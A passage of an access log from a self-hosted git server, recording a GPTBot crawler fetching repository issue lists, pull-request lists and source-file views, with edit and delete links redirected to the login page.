Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&state=all&type=all" +[17/Feb/2026:19:03:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9972] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&state=all&type=all" +[17/Feb/2026:19:03:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10160] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=oldest&state=open&type=all" +[17/Feb/2026:19:03:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11535] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:19:03:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 21574] [Gzip 6.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:19:03:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:19:03:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:19:03:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:19:03:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:19:03:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10047] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:03:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:03:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11137] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:19:03:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33692] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:19:03:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=rendered" [Client 74.7.227.38] [Length 11129] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:19:03:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=source" [Client 74.7.227.38] [Length 33387] [Gzip 10.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:19:03:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33681] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:19:03:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.AssemblyReference.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.AssemblyReference.cache" +[17/Feb/2026:19:03:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.AssemblyReference.cache" +[17/Feb/2026:19:03:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" +[17/Feb/2026:19:03:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" +[17/Feb/2026:19:03:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" [Client 74.7.227.38] [Length 11487] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0" +[17/Feb/2026:19:03:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.7.spec?display=source" [Client 74.7.227.38] [Length 12564] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.7.spec" +[17/Feb/2026:19:03:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.8.spec?display=source" [Client 74.7.227.38] [Length 12765] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.8.spec" +[17/Feb/2026:19:03:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.3.spec?display=source" [Client 74.7.227.38] [Length 12608] [Gzip 3.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.3.spec" +[17/Feb/2026:19:03:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.5_Final.spec?display=rendered" [Client 74.7.227.38] [Length 11146] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.5_Final.spec" +[17/Feb/2026:19:03:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.8.spec?display=source" [Client 74.7.227.38] [Length 12569] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.8.spec" +[17/Feb/2026:19:03:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.2.spec?display=source" [Client 74.7.227.38] [Length 12609] [Gzip 3.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.2.spec" +[17/Feb/2026:19:03:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.6_Final.spec?display=rendered" [Client 74.7.227.38] [Length 11146] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.6_Final.spec" +[17/Feb/2026:19:03:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.9.spec?display=source" [Client 74.7.227.38] [Length 12569] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.9.spec" +[17/Feb/2026:19:03:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v5.1.spec?display=source" [Client 74.7.227.38] [Length 12612] [Gzip 3.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v5.1.spec" +[17/Feb/2026:19:03:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/dist/PostgresPatrol-Debug.exe" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/dist/PostgresPatrol-Debug.exe" +[17/Feb/2026:19:03:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/dist/PostgresPatrol-Debug.exe" +[17/Feb/2026:19:03:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" [Client 74.7.227.38] [Length 9853] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" +[17/Feb/2026:19:03:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" +[17/Feb/2026:19:03:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" +[17/Feb/2026:19:03:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" [Client 74.7.227.38] [Length 1007] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" +[17/Feb/2026:19:03:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/.vscode/c_cpp_properties.json?display=rendered" [Client 74.7.227.38] [Length 10969] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:19:03:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:03:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10247] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:03:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&state=open&type=all" +[17/Feb/2026:19:03:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9993] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:03:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9991] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:03:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:03:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10184] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" +[17/Feb/2026:19:03:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md?display=source" [Client 74.7.227.38] [Length 15726] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" +[17/Feb/2026:19:03:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&state=closed&type=all" +[17/Feb/2026:19:03:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:03:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:03:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9999] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:03:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:03:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10068] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:03:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:03:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:03:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=farduedate&state=closed&type=all" +[17/Feb/2026:19:03:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:03:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:03:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 